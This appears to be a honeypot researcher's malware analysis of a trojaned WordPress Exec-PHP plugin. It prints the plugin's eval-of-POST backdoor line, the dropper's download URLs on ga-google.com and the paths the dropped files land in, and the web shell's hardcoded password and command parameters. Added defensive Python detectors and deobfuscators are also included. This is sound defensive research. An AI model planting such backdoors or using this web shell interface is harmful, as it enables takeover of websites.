A plugin with trojans:
- simple one-liner backdoor
- Chinese language web shell
- Kaylin Chinese language web shell
Apparently, an Exec-PHP plugin exists, but has been removed from WordPress.com's official list of plugins because it hasn't been updated since 2009.
That reconciles with this exec-php github repository. It appears that one of the original Exec-PHP's big contributors put the code on Github in 2009. The github repo's latest release is Exec-PHP 4.9, the same version sported by the kinked plugin documented here.
The kinked Zip file contains two files that don't appear identically in the exec-php github repository. These two files have Zip file dates much later than every other file in the downloaded Zip file:
1851 2017-11-03 14:46 exec-php/wall.php
2376 2016-11-07 12:18 exec-php/login_wall.php
The file exec-php/login_wall.php has contents related to other login_wall.php files.
These two files are the kink in the Exec-PHP plugin.
A couple of hours later, the same IP address tried to get wall.php and login_wall.php installed on my WordPress honey pot with a different plugin, "contact-form-7", which is also a real plugin, albeit under active development.
It's a Digital Ocean address. Not much to be learned there.
inetnum: 95.85.32.0 - 95.85.39.255
netname: DIGITALOCEAN-AMS-4
descr: Digital Ocean, Inc.
country: NL
created: 2013-11-23T02:11:35Z
last-modified: 2015-11-20T14:44:10Z
Downloaded to my honey pot as if the attackers had invoked a real WordPress site's upload plugin URL (/wordpress/wp-admin/plugin-install.php?tab=upload).
As such, the attackers sent a Zip file with the
The two malicious files in the plugin-download-Zip-file aren't terribly obfuscated.
login_wall.php has no obfuscation at all.
I analyze similar files named login_wall.php in another section.
There's some code in here that claims to be a plugin named "Login Wall". Such a plugin exists, but the only common thing between the real plugin and this malicious code are a few comments.
It also has a simple backdoor:

```php
if($_GET["login"]=="cmd"){if($_POST['123']==''){echo('->|OK|-<');exit();}eval($_POST['123']);exit();}
```
If you do an HTTP POST method request, with a URL ending in ?login=cmd, the backdoor looks at a POST parameter named "123". If parameter "123" has no value, the code replies "->|OK|-<", essentially a simple test of the backdoor. If parameter "123" has a non-zero-length value, the backdoor tries to eval that value as PHP source code.
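As an added example (not code from the original post), here is a small Python detector for the two sides of this backdoor: a static check for the `eval($_POST[...])` pattern and the `->|OK|-<` banner in PHP source, and a request classifier that labels a logged POST to `?login=cmd` as a probe (empty or missing `123`, the attacker checking that the backdoor answers) or an exec attempt (non-empty `123`). The sample source and the sample requests are constructed stand-ins, not captures from the honey pot.

```python
import re
from urllib.parse import parse_qs, urlsplit

# Indicators lifted from the login_wall.php one-liner quoted above.
OK_BANNER = "->|OK|-<"
# eval() applied straight to a POST parameter, whatever the parameter is called.
EVAL_OF_POST = re.compile(r"eval\s*\(\s*\$_POST\s*\[", re.IGNORECASE)

# Constructed stand-in for the backdoor line, so the block runs offline.
SAMPLE_SOURCE = (
    "<?php /* Plugin Name: Login Wall (constructed sample) */\n"
    "if($_GET[\"login\"]==\"cmd\"){if($_POST['123']==''){echo('->|OK|-<');exit();}"
    "eval($_POST['123']);exit();}\n"
)


def scan_php_source(src: str) -> list:
    """Return the names of backdoor indicators present in a PHP source string."""
    hits = []
    if EVAL_OF_POST.search(src):
        hits.append("eval-of-post-parameter")
    if OK_BANNER in src:
        hits.append("ok-banner")
    return hits


def classify_request(method: str, url: str, body: str) -> str:
    """Classify one HTTP request against the ?login=cmd handshake.

    'probe'  -> POST ...?login=cmd with an empty or missing '123' (the
                attacker testing whether the backdoor answers '->|OK|-<')
    'exec'   -> POST ...?login=cmd with a non-empty '123' (PHP to be eval'ed)
    'benign' -> anything else
    """
    if method.upper() != "POST":
        return "benign"
    query = parse_qs(urlsplit(url).query)
    if query.get("login") != ["cmd"]:
        return "benign"
    # PHP treats an undefined $_POST['123'] the same as '' in this comparison,
    # so a missing parameter is also a probe.
    form = parse_qs(body, keep_blank_values=True)
    return "exec" if form.get("123", [""])[0] else "probe"


# Constructed requests (method, URL, body) of the kind a honey pot would log.
SAMPLE_REQUESTS = [
    ("GET", "/wp-content/plugins/exec-php/login_wall.php", ""),
    ("POST", "/wp-content/plugins/exec-php/login_wall.php?login=cmd", "123="),
    ("POST", "/wp-content/plugins/exec-php/login_wall.php?login=cmd", "123=echo+1%3B"),
]


def classify_all(requests=SAMPLE_REQUESTS) -> list:
    """Classify every (method, url, body) tuple in order."""
    return [classify_request(m, u, b) for m, u, b in requests]


if __name__ == "__main__":
    print(scan_php_source(SAMPLE_SOURCE))   # ['eval-of-post-parameter', 'ok-banner']
    print(classify_all())                   # ['benign', 'probe', 'exec']
```

The static check is deliberately loose (any `eval` of any `$_POST` element) because the parameter name "123" is arbitrary and trivially changed; the request classifier is the part that keys on the specific `login=cmd` handshake this file uses.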
This is a dropper of sorts.
wall.php, when executed, tries to download 3 files from somewhere on the web:
http://ga-google.com/Nic/wu/bob.txt
http://ga-google.com/Nic/wu/emb.txt
http://ga-google.com/Nic/wu/plugin.txt
If everything in wall.php works correctly, these 3 files end up in 5 files:
- bob.txt → /wp-admin/user/editor.php
- plugin.txt → /wp-admin/includes/plugin-editor.php
- bob.txt → /wp-includes/pomo/editor.php
- emb.txt → /wp-includes/embes.php
- bob.txt → /wp-includes/images/require.png
- `~/src/php/reverse-php-malware/revphp plugin.txt > d2.php`. This basically concatenates and decodes strings in the source code, simple deobfuscating chores.
- Edit d2.php, change "eval" to "print": `php d2.php > d3.php`
- Pretty print: `~/src/php/reverse-php-malware/pp.php d3.php > f3.php`
- `cp bob.txt a3.php`; edit a3.php to include "<?php", change "eval" to "print"; `php a3.php > a4.php`; `~/src/php/reverse-php-malware/pp.php a4.php > a5.php`
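Added example, and not the author's revphp or pp.php tools: a Python re-implementation of the same static chores, written on the assumption that the obfuscation is the common `eval(base64_decode('...'))` wrapping plus `'a'.'b'` string concatenation (an assumption about the form, since the original plugin.txt and bob.txt are not reproduced here). It also includes the eval-to-print substitution from the steps above as a function. The two-layer sample is constructed inline.

```python
import base64
import binascii
import re

# 'a'.'b' with single-quoted PHP literals (no escape sequences inside)
CONCAT_RE = re.compile(r"'([^'\\]*)'\s*\.\s*'([^'\\]*)'")
# eval(base64_decode('...')) with an optional trailing semicolon
EVAL_B64_RE = re.compile(
    r"eval\s*\(\s*base64_decode\s*\(\s*'([A-Za-z0-9+/=]+)'\s*\)\s*\)\s*;?"
)


def join_literals(src: str) -> str:
    """Merge 'ab'.'cd' into 'abcd', repeating until nothing changes."""
    while True:
        new = CONCAT_RE.sub(lambda m: "'" + m.group(1) + m.group(2) + "'", src)
        if new == src:
            return src
        src = new


def _peel(m):
    """Replace eval(base64_decode('X')) with the code X it would have run."""
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-8")
    except (binascii.Error, UnicodeDecodeError):
        return m.group(0)          # not decodable text: leave it visible as-is


def unwrap(src: str, max_rounds: int = 10) -> str:
    """Statically peel nested eval/base64 layers and string concatenations."""
    for _ in range(max_rounds):
        new = EVAL_B64_RE.sub(_peel, join_literals(src))
        if new == src:
            break
        src = new
    return src


def eval_to_print(src: str) -> str:
    """The manual step from the post: eval(...) -> print(...), so running the
    file under php prints the next layer instead of executing it."""
    return re.sub(r"\beval\s*\(", "print(", src)


def _b64(s: str) -> str:
    return base64.b64encode(s.encode()).decode()


# Constructed two-layer sample: an eval/base64 wrapper around another
# eval/base64 wrapper around a harmless echo with a split string literal.
INNER = "echo 'wall'.'.php';"
LAYER2 = "eval(base64_decode('" + _b64(INNER) + "'));"
SAMPLE = "<?php eval(base64_decode('" + _b64(LAYER2) + "'));"


if __name__ == "__main__":
    print(unwrap(SAMPLE))          # <?php echo 'wall.php';
    print(eval_to_print(SAMPLE))   # same file with print( in place of eval(
```

`unwrap` substitutes the decoded code for the whole `eval(...)` call rather than for the string literal alone, which is what lets nested layers fall out one round at a time; anything that does not decode to text is left untouched so it stays visible for manual review.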
emb.txt has no obfuscation.
It consists of comments and only a single executable line of code:
```php
include("../wp-includes/images/require.png");
```
Wait, wall.php tried to create a file named like that.
Executing emb.txt (by HTTP invocation of /wp-includes/embes.php)
will cause the execution of bob.txt code, named as a PNG image file.
Classic local file inclusion, used as misdirection instead of an exploit.
plugin.txt, invoked via URL ending in /wp-admin/includes/plugin-editor.php,
implements a minimalistic web shell.
Execution is password-protected. Password is in plaintext in the code, "c5cd946631fa902a901c243055339788".
Password sent to plugin.txt via HTTP POST parameter named "pass".
It specifies the GB 2312 simplified Chinese character set in the HTTP headers of its response.
HTTP Parameters
| Name | Value | Purpose |
|---|---|---|
| p | rename | rename file, name in "file" parameter |
| p | delete | delete file or directory, name in "file" parameter |
| p | chmod | change permissions of file or directory, name in "file" parameter, permissions in "chvalue" |
| p | modFMT | change last access time of file named in "file" parameter, time in "time" |
| p | cmd | execute a shell command on server |
| p | eval | eval PHP code on server, from "eval" parameter |
| p | editfile | edit file, name in "file" parameter, via `<textarea>` in HTML form |
| q | downfile | send file from server, name in parameter "file", to user via HTTP |
| q | upfile | HTTP file upload to server, to directory named by parameter "dir" |
| q | createdir | create directory with name from "crdir" parameter on server |
| dir | directory path | change to this directory on server |
| eval | PHP source | PHP source to run on server |
| file | file name | send URL-encoded bytes |
| filenew | file name | rename a file to this name |
| chvalue | permissions | send permissions, rwxrwxrwx octal-style |
| crdir | directory name | send a directory name |
| time | timestamp | send a timestamp |
| ef | PHP builtin name | choice of what PHP builtin to execute a shell command |
| cmd | shell command | send shell command to server |
The code reads like some of these parameters are usually called directly by another program, all the "q" sub-commands, and some of the "p" subcommands. Other "p" subcommands ("editfile", "rename", "delete") cause the code to generate human readable HTML for a response.
If the "p" parameter is unset, or has a zero-length-string value, the code generates HTML appropriate for Dreaded Chinese Hackers to use to manage files.
After wall.php runs, the contents of bob.txt can be invoked remotely via 3 different URLs, since emb.txt merely includes bob.txt. As it happens, bob.txt contains an unmodified copy of kaylin file manager, which my honey pot has caught in the past.
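Added example (not from the post): a Python scan a WordPress operator could run against a site root to look for the five destination paths wall.php writes to, the two files that were added to the trojaned plugin zips, and the more general trace this dropper leaves behind, a file with an image extension whose contents start with a PHP open tag (bob.txt installed as require.png). The demo tree is constructed from harmless placeholder bytes, not the real dropped files.

```python
import tempfile
from pathlib import Path

# Destinations wall.php writes to, relative to the WordPress root (from the
# dropper's file mapping described above).
DROPPED_PATHS = [
    "wp-admin/user/editor.php",
    "wp-admin/includes/plugin-editor.php",
    "wp-includes/pomo/editor.php",
    "wp-includes/embes.php",
    "wp-includes/images/require.png",
]
# The two files that were added to the trojaned plugin zips.
PLUGIN_FILES = {"wall.php", "login_wall.php"}
IMAGE_SUFFIXES = {".png", ".jpg", ".jpeg", ".gif"}


def has_php_open_tag(path: Path) -> bool:
    """True if the first 4 KiB of the file contain a PHP open tag."""
    with path.open("rb") as fh:
        head = fh.read(4096)
    return b"<?php" in head or b"<?=" in head


def scan_wordpress_root(root) -> dict:
    """Return sorted relative paths grouped by finding type."""
    root = Path(root)
    findings = {"dropped_path": [], "plugin_file": [], "php_in_image": []}
    for rel in DROPPED_PATHS:
        if (root / rel).is_file():
            findings["dropped_path"].append(rel)
    for p in root.rglob("*"):
        if not p.is_file():
            continue
        rel = p.relative_to(root).as_posix()
        if p.name in PLUGIN_FILES and rel.startswith("wp-content/plugins/"):
            findings["plugin_file"].append(rel)
        # bob.txt was installed as require.png: PHP code under an image name.
        if p.suffix.lower() in IMAGE_SUFFIXES and has_php_open_tag(p):
            findings["php_in_image"].append(rel)
    return {k: sorted(v) for k, v in findings.items()}


def build_demo_tree() -> str:
    """Create a throwaway WordPress-like tree of constructed stand-ins
    (placeholder bytes only) and return its root directory."""
    root = Path(tempfile.mkdtemp(prefix="wp-demo-"))
    files = {
        "wp-includes/images/require.png": b"<?php /* constructed: PHP under a PNG name */ echo 1;",
        "wp-includes/images/real.png": b"\x89PNG\r\n\x1a\n" + b"\x00" * 16,
        "wp-includes/embes.php": b"<?php include('../wp-includes/images/require.png');",
        "wp-content/plugins/exec-php/login_wall.php": b"<?php /* constructed stand-in */",
        "wp-content/plugins/exec-php/exec-php.php": b"<?php /* legitimate plugin file */",
    }
    for rel, data in files.items():
        path = root / rel
        path.parent.mkdir(parents=True, exist_ok=True)
        path.write_bytes(data)
    return str(root)


if __name__ == "__main__":
    for kind, paths in scan_wordpress_root(build_demo_tree()).items():
        print(kind, paths)
```

The path list is specific to this dropper and will go stale; the `php_in_image` check is the durable part, since the include-a-PNG trick works regardless of which file names the next variant picks.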
whois says this:
Domain Name:ga-google.com
Registry Domain ID:1965912374_domain_com-vrsn
Registrar WHOIS Server:whois.paycenter.com.cn
Registrar URL:http://www.xinnet.com
Updated Date:2018-10-06T00:37:45.00Z
Creation Date:2015-10-04T08:25:02.00Z
Registrar Registration Expiration Date:2019-10-04T08:25:02.00Z
Registrar:XINNET TECHNOLOGY CORPORATION
Registrar IANA ID:120
Registrar Abuse Contact Email:[email protected]
Registrar Abuse Contact Phone:+86.1087128064
Xinnet Technology Corporation has very odd information available. Bloomberg research says this:
Xin Net Technology Corp. is based in Beijing, China. Xin Net Technology Corp. operates as a subsidiary of Global Peopleline Telecom, Inc.
The same Bloomberg research says that Global Peopleline Telecom, Inc. went out of business in 2011.
Xin Net Tech has a Beijing, China address, while Global Peopleline Telecom has a Vancouver, Canada address. I smell a rat.
ga-google.com has IP address 209.141.58.97,
and whois says this about 209.141.58.97:
NetRange: 209.141.32.0 - 209.141.63.255
CIDR: 209.141.32.0/19
NetName: PONYNET-04
NetHandle: NET-209-141-32-0-1
Parent: NET209 (NET-209-0-0-0-0)
NetType: Direct Allocation
OriginAS: AS53667
Organization: FranTech Solutions (SYNDI-5)
RegDate: 2011-01-27
Updated: 2012-03-25
Ref: https://rdap.arin.net/registry/ip/209.141.32.0
FranTech Solutions appears to be a low-cost VPS vendor.
A Chinese company with no official officers operating as a subsidiary of a Canadian company that's gone out of business rents its servers from a VPS vendor who "humbly ask that you try out our alternative brand, BuyVM". Sounds totally sane and totally legal to me.